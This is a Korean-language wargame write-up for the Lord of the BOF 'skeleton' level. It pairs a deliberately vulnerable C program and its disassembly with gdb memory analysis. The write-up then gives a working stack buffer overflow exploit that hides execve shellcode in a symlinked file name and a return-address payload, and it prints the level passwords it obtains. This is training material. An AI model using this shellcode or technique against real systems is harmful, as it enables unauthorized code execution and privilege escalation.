1. intro
2. code 및 분석
2.1 C code
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Wargame target program ("skeleton" level), deliberately vulnerable.
 * Copies argv[1] into a 40-byte stack buffer after a length check that
 * still permits 48 bytes, then zeroes every environment string and every
 * argv string in place.
 *
 * Review notes (defender's view, from the visible code only):
 *  - memset(), strlen() and strcpy() are called without #include <string.h>,
 *    so they rely on implicit function declarations (pre-C99 behaviour).
 *  - main has no declared return type (implicit int) and never returns a
 *    value; the only exits are via exit(0).
 *  - argv[1][47] is read before argv[1]'s length is checked, so an
 *    argument shorter than 48 bytes makes that read out of bounds.
 *  - The "> 48" check permits up to 48 bytes plus the terminating NUL to be
 *    strcpy'd into a 40-byte buffer: up to 9 bytes are written past the end
 *    of buffer on the stack. A bounded copy, e.g.
 *    snprintf(buffer, sizeof buffer, "%s", argv[1]), or rejecting
 *    strlen(argv[1]) >= sizeof buffer, would close the overflow.
 *  - Wiping argv and environ does not remove the overflow; the memory dump
 *    later on this page shows the executable's path string is still present
 *    near the top of the stack after the wipe.
 */
main(int argc, char *argv[])
{
    char buffer[40];               // 40 bytes; argv[1] may be up to 48 (see check below)
    int i, saved_argc;

    // Require at least one argument; argv[1] is dereferenced below.
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter
    // Zero every environment string in place (the pointers stay, the bytes go).
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    // Byte 47 of argv[1] must be 0xbf. NOTE(review): this index is read before
    // the length check, so a short argv[1] is an out-of-bounds read here.
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument
    // NOTE(review): the limit is 48, but buffer holds only 40 bytes, so the
    // unbounded strcpy below can still write past the end of buffer.
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    // argc saver
    // argc is copied so the later argv wipe is not affected by any stack
    // corruption from the overflow.
    saved_argc = argc;

    strcpy(buffer, argv[1]);       // unbounded copy: the overflow point
    printf("%s\n", buffer);

    // buffer hunter
    // Zero the 40 buffer bytes after printing (bytes written past buffer are
    // not cleared).
    memset(buffer, 0, 40);

    // ultra argv hunter!
    // Zero every argv string in place, including argv[0].
    for(i=0; i<saved_argc; i++)
        memset(argv[i], 0, strlen(argv[i]));
}
2.3. 분석
2.3.1. assembler code (중요 부분)
앞과 동일하지만, 추가된 부분은 아래와 같이 argv 모두를 초기화한다는 점이다.
0x8048623 <main+291>: mov 0xffffffd4(%ebp),%eax
0x8048626 <main+294>: cmp 0xffffffd0(%ebp),%eax
0x8048629 <main+297>: jl 0x8048630 <main+304>
0x804862b <main+299>: jmp 0x8048670 <main+368>
0x804862d <main+301>: lea 0x0(%esi),%esi
0x8048630 <main+304>: mov 0xffffffd4(%ebp),%eax
0x8048633 <main+307>: lea 0x0(,%eax,4),%edx
0x804863a <main+314>: mov 0xc(%ebp),%eax
0x804863d <main+317>: mov (%eax,%edx,1),%edx
0x8048640 <main+320>: push %edx
0x8048641 <main+321>: call 0x80483f0 <strlen>
0x8048646 <main+326>: add $0x4,%esp
0x8048649 <main+329>: mov %eax,%eax
0x804864b <main+331>: push %eax
0x804864c <main+332>: push $0x0
0x804864e <main+334>: mov 0xffffffd4(%ebp),%eax
0x8048651 <main+337>: lea 0x0(,%eax,4),%edx
0x8048658 <main+344>: mov 0xc(%ebp),%eax
0x804865b <main+347>: mov (%eax,%edx,1),%edx
0x804865e <main+350>: push %edx
0x804865f <main+351>: call 0x8048430 <memset>
0x8048664 <main+356>: add $0xc,%esp
0x8048667 <main+359>: incl 0xffffffd4(%ebp)
0x804866a <main+362>: jmp 0x8048623 <main+291>
0x804866c <main+364>: lea 0x0(%esi,1),%esi
3. 취약점 확인 및 공격 준비
3.1 취약점
취약점은 동일하다.
3.2 공격 준비
환경변수 영역 및 stack 모두 초기화해버리기에 더 이상 값을 쓸 곳이 없어 보이지만,
가장 마지막 부분으로 가보면 어떤 값이 들어있다.
0xbfffffb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd8: 0x00000000 0x00000000 0x00000000 0x6f682f00
0xbfffffe8: 0x762f656d 0x69706d61 0x732f6572 0x656c656b
0xbffffff8: 0x00616f74 0x00000000 Cannot access memory at address 0xc0000000
이를 출력해보면 파일명임을 알 수 있다.
그럼 심볼릭 링크를 통해 변경된 파일명이 삽입되는지 확인해보자.
[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100'`
[vampire@localhost vampire]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA skeleton
skeletoa skeleton.c
[vampire@localhost vampire]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb) b *main+368
(gdb) r `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
Starting program: /home/vampire/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
/bin/bash2: /home/troll/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Breakpoint 1, 0x8048670 in main ()
(gdb) x/40x 0xbfffff00
0xbfffff00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff80: 0x00000000 0x00000000 0x6f682f00 0x762f656d
0xbfffff90: 0x69706d61 0x412f6572 0x41414141 0x41414141
(gdb)
0xbfffffa0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffffe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffff0: 0x41414141 0x41414141 0x00414141 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
4. exploit
위를 토대로 파일명을 쉘코드로 사용하여 공격해보면 아래와 같다.
[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
skeletoa
skeleton
skeleton.c
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) groups=509(vampire)
bash$ my-pass
euid = 509
music world
bash$ exit
exit
[vampire@localhost vampire]$ rm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀
[vampire@localhost vampire]$ ln -s skeleton `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder